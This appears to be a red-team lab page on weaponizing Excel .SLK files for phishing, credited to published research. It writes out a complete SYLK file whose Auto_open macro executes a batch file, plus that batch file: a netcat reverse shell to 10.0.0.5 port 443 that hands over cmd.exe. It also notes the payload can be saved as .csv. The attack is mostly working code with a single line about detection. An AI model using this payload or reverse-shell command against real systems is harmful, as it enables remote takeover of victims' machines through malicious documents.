Skip to content

Latest commit

 

History

History
53 lines (32 loc) · 1.34 KB

File metadata and controls

53 lines (32 loc) · 1.34 KB

Phishing: .SLK Excel

This lab is based on findings by @StanHacked - see below references for more info.

Weaponization

Create an new text file, put the the below code and save it as .slk file:

{% code title="demo.slk" %}

ID;P
O;E
NN;NAuto_open;ER101C1;KOut Flank;F
C;X1;Y101;K0;EEXEC("c:\shell.cmd")
C;X1;Y102;K0;EHALT()
E

{% endcode %}

Note that the shell.cmd refers to a simple nc reverse shell batch file:

{% code title="c:\shell.cmd" %}

C:\tools\nc.exe 10.0.0.5 443 -e cmd.exe

{% endcode %}

Execution

Once the macro warning is dismissed, the reverse shell pops as expected:

Since the file is actually a plain text file, detecting/triaging malicious intents are made easier.

Bonus

Note that the payload file could be saved as a .csv - note the additional warning though:

References

{% embed url="https://www.youtube.com/watch?v=xY2DIRfqNvA" %}

http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-18-the-ms-office-magic-show-stan-hegt-pieter-ceelen

{% embed url="https://twitter.com/StanHacked/status/1049047727403937795" %}